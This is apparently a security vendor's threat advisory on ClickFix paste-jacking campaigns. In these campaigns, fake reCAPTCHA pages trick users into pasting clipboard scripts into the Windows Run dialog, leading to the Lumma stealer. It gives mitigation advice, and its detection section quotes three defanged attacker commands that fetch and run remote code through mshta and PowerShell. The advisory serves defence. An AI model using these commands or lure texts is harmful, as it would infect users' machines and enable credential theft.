Threat Actors Using Paste-Jacking to Achieve Remote Code Execution

A user is often presented to what seems to be a reCAPTCHA or some type of “Verify that you are human” check. The subject is then tricked into running a script on their device, which has been added to the user’s clipboard through a JavaScript hook. The user is then instructed to press Win-key + R and then Ctrl + V to paste the payload into mshta.exe or similar.

Truesec Security Operations Center has observed variants of this technique. Instead of showing the instructions instantly, it presents a reCAPTCHA which then shows an error message stating. Proving that this technique is constantly re-innovated. The error message looks like this:

• “Verification Failed – Network Error”
• “The network DNS might be unstable, causing errors. “
• “To fix this: Press Windows + R. Press CTRL + V, Press Enter.”

The Truesec SOC has also observed an increase in ClickFix attacks targeting macOS. The attack technique remains similar to previously described methods. This update aims to inform you about a potential new campaign targeting this specific operating system. SecurityWeek recently published an article on the subject as well [1].

When the script has been executed, we have observed connections to actor-controlled servers, followed by registry changes and the host downloading the “Lumma” stealer.

This campaign has likely been carried out by the threat actor known as Evil Corp, which are also behind SocGholish and Raspberry Robin.

Exploitation

This technique has been observed across many of our customers, all affected customers has been notified through an incident report.

Recommended Actions

Inform your users about the evolving landscape of phishing techniques. Paste-jacking is a relatively new technique which is currently being weaponized and utilized by more threat actors and Truesec expects to see more occurrences of this attack technique. To mitigate the risk of paste jacking attacks, we recommend disabling the Run command (Windows + R) through Group Policy (GPO). Before implementing this measure in your production environment, Truesec advises conducting an internal assessment to ensure compatibility with your operational needs. In most cases, this change is not expected to cause issues by default.

Detection

Commands seen executed in the paste-jacking event, only one of these is used:

mshta hxxps://captha-secure[.]com/capcha[.]html # ✅ ”I am not a robot – reCAPTCHA Verification ID: 3781”

iwr -useb hxxp://185[.]149[.]146[.]164/trwsfg[.]ps1 | iex

mshta 80.64.30.238/evix.xll # Microsoft Windows: Fix Internet DNS Service reconnect

References

[1] https://www.securityweek.com/clickfix-attacks-against-macos-users-evolving/